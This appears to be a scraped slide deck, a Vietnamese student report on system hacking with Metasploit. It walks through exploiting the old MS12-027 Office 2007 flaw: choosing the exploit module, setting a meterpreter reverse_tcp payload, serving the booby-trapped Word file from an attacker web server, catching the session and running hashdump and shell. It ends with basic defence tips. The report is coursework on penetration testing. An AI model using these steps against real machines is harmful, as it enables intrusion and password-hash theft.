cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015 cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015
cac tinh huong thuong gap khi cai dat va su dung misa sme.net 2015
 
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019
 
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu
 
SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2
 
SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1
 

Bao cao

  • 1. Đề tài: System Hacking Sinh viên: Trần Văn Vịnh Nguyễn Minh Tiến GVHDTT : Võ Đỗ Thắng
  • 2. Nội dung • 1. Giới thiệu về System Hacking, Metasploit và cách sử dụng Metasploit Framework. • 2. Khai thác lỗi Microsoft Office 2007, mã lỗi ms12_027. • 3. Khai thác lỗi Adobe Reader 9 trên WinXP. (Demo video) • 4. Tấn công WinXP sử dụng lỗi Internet Explorer, mã lỗi ms12_004. (Demo code) • 5. Các phương pháp bảo mật, phòng tránh System Hacking.
  • 3. I. Giới thiệu System Hacking, metasploit framework 1. Giới thiệu system hacking System hacking bao gồm những kỹ thuật lấy username, password dựa vào phần mềm cài trên hệ thống hoặc tính dễ cài đặt và chạy các dịch vụ từ xa của hệ điều hành. Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin, xóa những log file hệ thống. 2. Giới thiệu về MSF(metasploit framework) MSF là một framework mã nguồn mở, được phát triển với mục đích cung cấp các thông tin về các lỗ hổng bảo mật, hỗ trợ để thử nghiệm các xâm nhập hệ thống (penetration testing: pen-testing ). Ban đầu MSF được viết bằng ngôn ngữ Perl, nhưng từ phiên bản 3.0 trở đi MSF được viết lại toàn bộ bằng Ruby, và được bổ sung thêm các công cụ khác trong nghiên cứu bảo mật như các công cụ thu thập thông tin, fuzzing, scanner ..
  • 4. II. Sử dụng Metasploit Framework 1) Chọn module exploit Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác - show exploits: xem các module exploit mà framework có hỗ trợ - use exploit_name: chọn module exploit - info exploit_name: xem thông tin về module exploit 2) Cấu hình module exploit đã chọn - show options: Xác định những options nào cần cấu hình - set : cấu hình cho những option của module đó Một vài module còn có những advanced options, chúng ta có thể xem bằng cách gõ dòng lệnh show advanceds 3) Verify những options vừa cấu hình - check: kiểm tra xem những option đã được set chính xác chưa.
  • 5. 4) Lựa chọn payload Payload là đoạn code mà sẽ chạy trên hệ thống remote machine, là một phần của virus máy tính để thực thi mã độc. - show payloads: liệt kê ra những payload của module exploit hiện tại - info payload_name: xem thông tin chi tiết về payload đó - set payload payload_name: xác định payload module name.Sau khi lựa chọn payload nào, dùng lệnh show options để xem những options của payload đó - show advanced: xem những advanced options của payload đó 5) Thực thi exploit - exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho chúng ta những thông tin về hệ thống được khai thác II. Sử dụng Metasploit Framework
  • 6. III. Khai thác lỗi Microsoft Office 2007, ms12_027 - Vào Terminal, gõ msfconsole và Enter:
  • 7. Để dùng mã lỗi ms12-027: search ms12-027 và enter III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 8. Ta gõ tiếp: use exploit/windows/fileformat/ms12_027_mscomctl_bof và enter III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 9. - set PAYLOAD windows/meterpreter/reverse_tcp III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 10. Dùng lệnh: show options để xem các tham số cần thiết để có thể tiến hành tấn công được: III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 11. III. Khai thác lỗi Microsoft Office 2007, ms12_027 Set filename : tên file word chứa mã đôc. Set lhost: IP của máy tấn công. Exploit : thực thi.
  • 12. Copy file word chứa mã độc vào /var/www để máy victeam có thể download về. III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 13. /ect/init.d/apache2 start : khởi động máy chủ ảo. III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 14. - use exploit/multi/handler - Set lại lhost và payload. - exploit để bắt đầu khởi động server. III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 15. - Tại máy victeam ta truy cập vào địa chỉ của máy tấn công để downlad file word chứa mã độc về. - Sau đó mở file word đó lên. III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 16. Đợi một lát, trên máy tính tấn công ta được: III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 17. - Để tương tác với 1 session nào đó ta thực hiện: sessions –i 1 (1 là id của sessions) - Bây giờ thì mọi việc đã trở nên dễ dàng hơn, khi kẻ tấn công đã điều khiển được máy nạn nhân với toàn quyền. Ví dụ: - Lệnh sysinfo để lấy thông tin của máy nạn nhân: - Lệnh hashdump để lấy mật khẩu của người dùng dưới dạng hash - Chúng ta có thể xem tất cả các lệnh hỗ trợ bằng lênh: help III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 18. Lệnh rất hữu ích để sử dụng cmd (command-line): shell III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 19. IV. Khai thác lỗi Adobe Reader Video demo: https://www.youtube.com/watch?v=xRgq7cZgCwo&feature=youtu.be
  • 20. V. Khai thác lỗi Internet Explorer, ms12_004 Demo code
  • 21. VI. Các phương pháp bảo mật, phòng tránh System Hacking. • Cài đặt phần mềm diệt virut Internet Security. • Thường xuyên cập nhật các bản vá lỗi của Microsofts, Windows để tránh bị hacker lợi dụng. • Luôn sử dụng các bản Office có bản quyền để luôn được cập nhật vá lỗi và hỗ trợ kỹ thuật từ nhà cung cấp. • Không nên mở các file Word, PDF, Link liên kết lạ… từ email không rõ nguồn gốc.
  • 22. CÁM ƠN THẦY VÀ CÁC BẠN ĐÃ LẮNG NGHE